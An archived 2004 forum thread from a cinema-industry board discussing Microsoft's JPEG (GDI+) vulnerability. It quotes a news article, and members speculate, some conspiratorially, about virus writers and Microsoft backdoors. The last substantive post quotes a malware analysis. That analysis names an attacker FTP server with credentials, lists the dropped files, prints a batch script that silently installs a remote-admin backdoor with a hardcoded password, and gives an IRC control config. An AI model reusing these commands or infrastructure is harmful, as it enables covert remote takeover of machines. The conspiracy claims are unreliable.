Film-Tech Forum ARCHIVE: Viruses in JPEG images

my profile | my password | search | faq & rules | forum home

»	Film-Tech Forum ARCHIVE » Community » Film-Yak » Viruses in JPEG images (Page 1)

This topic comprises 2 pages: 1 2

Author

Topic: Viruses in JPEG images

Brad Miller
Administrator

Posts: 17775
From: Plano, TX (36.2 miles NW of Rockwall)
Registered: May 99

posted 09-19-2004 12:41 AM

As if we don't have enough spamming and viruses in this world...

Microsoft warns of poisoned picture peril

quote:
Microsoft warns of poisoned picture peril

By Kevin Poulsen, SecurityFocus
Published Wednesday 15th September 2004 07:39 GMT

The old bromide that promises you can't get a computer virus by looking at an image file crumbled a bit further Tuesday when Microsoft announced a critical vulnerability in its software's handling of the ubiquitous JPEG graphics format.

The security hole is a buffer overflow that potentially allows an attacker to craft a special JPEG file that would take control of a victim's machine when the user views it through Internet Explorer, Outlook, Word, and other programs. The poisoned picture could be displayed on a website, sent in email, or circulated on a P2P network.

Windows XP, Windows Server 2003 and Office XP are vulnerable. Older versions of Windows are also at risk if the user has installed any of a dozen other Microsoft applications that use the same flawed code, the company said in its advisory. The newly-released Windows XP Service Pack 2 does not contain the hole, but vulnerable versions of Office running atop it can still be attacked if left unpatched. Patches are available from Microsoft's website.

The company said it's not aware of the hole being publicly exploited in the wild, and has not seen any examples of proof of concept code.

The JPEG bug rounds out a growing menagerie of vulnerabilities in code that displays image files. Mozilla developers last month patched the open-source browser against a critical hole discovered in a widely-deployed library for processing PNG images. And last July, Microsoft simultaneously fixed two image display holes in Internet Explorer: one made users potentially vulnerable to maliciously-crafted BMP images, the second to corrupt GIF files. The GIF bug had been publicly disclosed 11 months earlier.

There was a time when the idea of a malicious image file was absurd enough to be the topic of an April Fools joke. One early and widely-circulated hoax message dating from 1994 warned users of a computer virus infecting the comment field of JPEG files.

"It was someone saying that just looking at a JPEG on your screen can get you a virus," recalls Rob Rosenberg, editor of the debunking site Vmyths.com. "In '94 it was a myth, but in '04 it's the real thing... We've got the JPEG of death now."

Here is what Microsoft's website has to say

| IP: Logged

Joe Redifer
You need a beating today

Posts: 12859
From: Denver, Colorado
Registered: May 99

posted 09-19-2004 12:59 AM

Microsoft should hire some full time employees that are actually smart. Why are there so many dumbasses who work for big corporations that don't make good products? Hell, I doubt they even beta test their products. But people will stupidly keep buying it, so Microsoft has NOTHING to worry about.

| IP: Logged

Bruce Hansen
Jedi Master Film Handler

Posts: 847
From: Stone Mountain, GA, USA
Registered: Dec 1999

posted 09-19-2004 02:08 PM

Microsoft products have so many patches on them, they look like quilts.

| IP: Logged

Steve Kraus
Film God

Posts: 4094
From: Chicago, IL, USA
Registered: May 2000

posted 09-19-2004 07:19 PM

Is it about time to consider criminal penalties for people who write or disseminate viruses, etc.? This is costing society billions.

| IP: Logged

Joe Redifer
You need a beating today

Posts: 12859
From: Denver, Colorado
Registered: May 99

posted 09-19-2004 07:59 PM

I think such penalties do exist. But it is extremely difficult to find the perpetrators.

| IP: Logged

Steve Kraus
Film God

Posts: 4094
From: Chicago, IL, USA
Registered: May 2000

posted 09-19-2004 08:21 PM

You don't suppose there is more than a symbiotic relationship (and by that I mean $$$) between virus makers and anti virus software vendors, do you? I mean who has the most to gain?

| IP: Logged

Bobby Henderson
"Ask me about Trajan."

Posts: 10973
From: Lawton, OK, USA
Registered: Apr 2001

posted 09-19-2004 10:48 PM

I don't think there is much desire on the part of the government to crack down on virus writers. Aside from the anti-viral software industry conspiracy, there are other reasons for the lack of a crack down.

The government is probably not making lots of busts because they might wind up arresting more than a few political friends who also happen to be white collar criminals. I know this sounds like a reach, but think about it. To find virus writers means coming up with more efficient ways to follow money trails. If they go digging too efficiently into records of lots of financial transactions, some of their good-ol-boy-network buddies are going to get caught in the net as it is pulled into the boat.

Then you have the other problem: who the viruses are hurting.

The government clearly doesn't care about end users of personal computers and the lost productivity we suffer from all the spam and viruses. Big corporations are hardly affected by this at all. Sure, you'll get a denial of service attack once in awhile on a major web site. But overall major corporations suffer very little down time at all over this stuff. Their operations don't run on little off the shelf PCs. They're using UNIX mainframes and stuff like that.

| IP: Logged

Daryl C. W. O'Shea
Film God

Posts: 3977
From: Midland Ontario Canada (where Panavision & IMAX lenses come from)
Registered: Jun 2002

posted 09-20-2004 02:04 AM

There's no money trail to follow. Anti-Virus companies don't need to pay people to write virii. There are plenty of college/university losers with no girlfriends to write them free o' charge.

More on topic. There aren't, as of the present, any virii embedded in JPEG files. It's possible to exploit certain pieces of software that use a common module, but no one has done it yet. Microsoft is, yet again, being proactive on patching their products.

The problem is they can't win either way. They release a patch before there's an exploit and lazy people don't install the patch. Then somebody reverse engineers the patch (not entirely hard to do if you know what you're doing), and releases an exploit to attack those long unpatched systems. People bitch at Microsoft. They can't win.

As for tracking down the people who write virii, etc. It's far more difficult to do than tracking down spam sources, for instance.

Imagine you come across a blank piece of generic paper. Then you go to some (any) library a type out something, like a riddle, whatever. Then print that on a very common (and therefore untraceable) printer, such as any number of Hewlett Packard LaserJets. The stick that riddle in an envelope, address, and stamp it, without leaving any personally identifying evidence. Then mail that from anywhere in the world. Yes, pretend that you can mail it anywhere in the world you want at no additional cost. Now tell me how to track you down after I receive it. It's not easy.

Sending instructions can be done annonymously so long as you don't require any response back. In some cases, you can even accept a response but drop it before it ever gets anywhere near you.

| IP: Logged

Ben Holley
Film Handler

Posts: 65
From: Texas
Registered: Feb 2004

posted 09-20-2004 11:07 AM

this may be a little offtopic but me and a computer savvy friend were discussing the amount of security flaws being discovered and exploited in windows has been on the rise since the homeland security act was passed. Which lead to us discussing if maybe microsoft was leaving backdoors in its patches and updates for big brother, has anyone else heard these rumors?

| IP: Logged

Jeff Stuckey
Film Handler

Posts: 62
From: Oklahoma City, OK, USA
Registered: May 2003

posted 09-20-2004 04:45 PM

I actually got this, and Cox Communications shut my service down. I called, and they said my account was suspended because I was sending out a virus. Which I thought was rather odd because I barely use my computer at home. So they turned me back on long enough to do a live update and scan the drive. It found no virus. I called them back and they still would not turn me back on. Said it was probably a trojan virus, then accused me of downloading from Kazaa that could probably be the problem. I promptly informed them I haven't used Kazaa for a year or so now. The professional all-knowing Cox tech then told me to just format my C drive, then call them back. [Mad]

I told him I was behind three firewalls (router, Zone Alarm and Windows XP). He said that wouldn't matter. And Cox has this big anti-virus free campaign BS going on too.

I went in and did a system restore backing up about 2 days, then called them back the next morning. So far no problems. Was told by Cox that this was my first "strike". Two more, and they will not turn me back on. Nice, huh.

Some people have just way too much time on their hands.

| IP: Logged

Daryl C. W. O'Shea
Film God

Posts: 3977
From: Midland Ontario Canada (where Panavision & IMAX lenses come from)
Registered: Jun 2002

posted 09-20-2004 04:48 PM

What's so wrong with Cox being responsible and protecting their and others' networks from abuse?

You did install all applicable security updates after you rolled back the system, right?

| IP: Logged

Bobby Henderson
"Ask me about Trajan."

Posts: 10973
From: Lawton, OK, USA
Registered: Apr 2001

posted 09-20-2004 06:18 PM

quote: Daryl C. W. O'Shea
There's no money trail to follow.

Sure there is. Spammers make a lot of money from this method of advertising. And some spammers have been caught over the money exchanging hands instead of computer forensics.

There is also a money trail with all the fraud from phishing and other schemes. The federal government just doesn't feel like doing much about this problem because it doesn't appear to be hurting any powerful, politically connected people bad enough. To them it is just a minor annoyance. And for some businesses out there it is a gold mine.

| IP: Logged

Daryl C. W. O'Shea
Film God

Posts: 3977
From: Midland Ontario Canada (where Panavision & IMAX lenses come from)
Registered: Jun 2002

posted 09-20-2004 06:32 PM

I thought we were talking about money trails to common virii, my bad.

quote: Bobby Henderson
To find virus writers means coming up with more efficient ways to follow money trails.

| IP: Logged

Mark Lensenmayer
Phenomenal Film Handler

Posts: 1605
From: Upper Arlington, OH
Registered: Sep 1999

posted 09-27-2004 10:06 PM

Looks like it's not theoritical any more:

JPEG Virus Found

Here are some comments:

quote:
Once this JPEG overflowed GDI+, it phoned home, connected to and ftp site and downloaded
almost 2megs of stuff. It installs a trojan that installs itself as a service.

It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."

It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users where logged in!)

it downloads these files:

-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe

and executes 'execute.bat', which looks like:

regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server

it also installs an irc client with this config info:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d

| IP: Logged

Joe Redifer
You need a beating today

Posts: 12859
From: Denver, Colorado
Registered: May 99

posted 09-27-2004 10:48 PM

Just another hole in the screen door known as Windows.

| IP: Logged

All times are Central (GMT -6:00)

This topic comprises 2 pages: 1 2

Printer-friendly view of this topic

The Film-Tech Forums are designed for various members related to the cinema industry to express their opinions, viewpoints and testimonials on various products, services and events based upon speculation, personal knowledge and factual information through use, therefore all views represented here allow no liability upon the publishers of this web site and the owners of said views assume no liability for any ill will resulting from these postings. The posts made here are for educational as well as entertainment purposes and as such anyone viewing this portion of the website must accept these views as statements of the author of that opinion and agrees to release the authors from any and all liability.